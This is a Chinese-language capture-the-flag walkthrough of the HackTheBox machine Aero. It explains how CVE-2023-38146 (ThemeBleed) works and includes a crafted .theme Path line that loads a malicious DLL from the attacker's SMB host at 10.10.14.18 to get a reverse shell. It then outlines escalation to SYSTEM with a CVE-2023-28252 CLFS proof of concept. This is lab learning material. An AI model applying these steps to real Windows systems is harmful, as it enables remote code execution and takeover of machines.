HackTheBox - Medium - Windows - Aero

发布时间:2023年12月21日

Aero

这个机器利用了今年比较新的cve,关于windows11的漏洞,类似于lnk、scf,但这个危害更高,通过易受攻击的windows11 利用theme、msstyles来实现RCE.


Aero 是一台中等难度的 Windows 机器,最近有两个 CVE:CVE-2023-38146(影响 Windows 11 主题)和 CVE-2023-28252(针对通用日志文件系统 (CLFS)。初始访问是通过使用 ThemeBleed 概念验证构建恶意有效负载来实现的,从而导致反向 shell。站稳脚跟后,在用户的主目录中发现 CVE 披露通知,表示存在 CVE-2023-28252 漏洞。需要修改现有概念证明,以便将权限提升到管理员级别或作为 NT Authority\SYSTEM 执行代码。


外部信息收集

端口扫描

循例nmap

file

虽然对于windows靶机来说这个暴露的端口数量有点奇怪,但扫了两次,确定只有80

80 - Windows 11 .theme (CVE-2023-38146)

在网站主页,这里提到了windows 11的主题

file

下面还有个文件上传,这个是用来上传主题文件的

file

我们通过谷歌搜索关于windows 11主题相关的漏洞我们能找到一点线索(虽然在靶机介绍中已经告诉了我们)

file

当上传theme文件后,它会测试这个文件

file

分析一下原理

这里研究了一下,中间偷天换日给我一个很不错的感受,其实很简单。

首先.theme文件类似于scf那种的ini文件,而theme需要加载.msstyles文件

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles

总所周知,我们可以利用windows特色,这里的.msstyles文件很明显,我们能够通过UNC path来访问

Path=\\10.10.14.18\tb\Aero.msstyles

.msstyles也有版本之分,我们具体关注version 999,看一下uxtheme.dll加载999的msstyles文件会做什么

if ( return_val < 0 && (_WORD)version == 999 ) // !!! [2] special case for version 999
  {
	resource_size = 999;
	return_val = ReviseVersionIfNecessary(msstyles_path, 999, (int *)&resource_size); // !!! [3] call to `ReviseVersionIfNecessary`
...

而函数ReviseVersionIfNecessary对我们而言,会做以下对我们有利的事情:

  1. 在.msstyles文件的所在目录下寻找xxxx_vrf.dll
  2. 如果xxxx_vrf.dll文件存在则打开文件验证签名
  3. 如果签名有效则关闭该文件,否则直接退出
  4. 将xxxx_vrf.dll文件作为DLL加载并调用VerifyThemeVersion函数

看起来确实很安全的样子,但我相信是得益于UNC path,使它脆弱了

我们可以看到这个流程下来,xxxx_vrf.dll被加载了两次,如果没有UNC,这一切在windows本地,可能这一切看起来似乎都正常

而我说了是UNC令它发挥了作用,使它脆弱的可利用,这是我自己的理解。

在第三步中,验证完就关闭了文件,到第四步的时候想打开xxxx_vrf.dll的时候,则需要再次通过smb来请求该文件,然而这时候,是不需要再次验证的,而是直接加载的。

所以攻击方法就出来了,等到第三步验证完文件签名后,当易受攻击的windows尝试通过smb请求xxxx_vrf.dll以进行第四步时

在这个时候,当它试图通过smb向我们攻击者请求xxxx_vrf.dll文件时,我们可以控制smb server使其返回一个恶意的dll,由于它不会再进行签名验证,所以会直接加载恶意dll。

themebleed.py这个项目利用是themebleed.exe的python版本,我们可以使用themebleed.py在linux上使用x86_64-w64-mingw32-g++对cpp编译成dll并且对smbserver进行控制,在第四步的时候返回恶意dll文件给受害者

file

我们通过对themebleed.py源码进行审计就可以很容易就发现这一点,当发确定受害者是第二次请求xxxx_vrf.dll时,则控制smbserver返回恶意dll

现在我们可以开始利用themebleed.py来getshell

file

开启nc监听,同时在80端口上传theme文件

file

当遇到红色的那行输出时(输出了“evil”字符串是因为我修改的代码),则代表已经在第四步返回了恶意dll

当我们再次查看nc时,我们应该获得了我们想要的

file

user flag在老地方

本地权限提升

在Documents目录下发现了这个

file

很轻松就找到了关于这个cve的POC

针对 Windows 11 21H2, clfs.sys 版本 10.0.22000.1574,虽然它也适用于 Windows 10 21H2、Windows 10 22H2、Windows 11 22H2 和 Windows Server 2022。

把项目下载,搞个powershell reverse shell payload,用vs编译项目

file

通过http上传到目标

file

执行exp同时查看nc

file

root flag还在老地方

文章来源:https://blog.csdn.net/qq_54704239/article/details/135119798
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。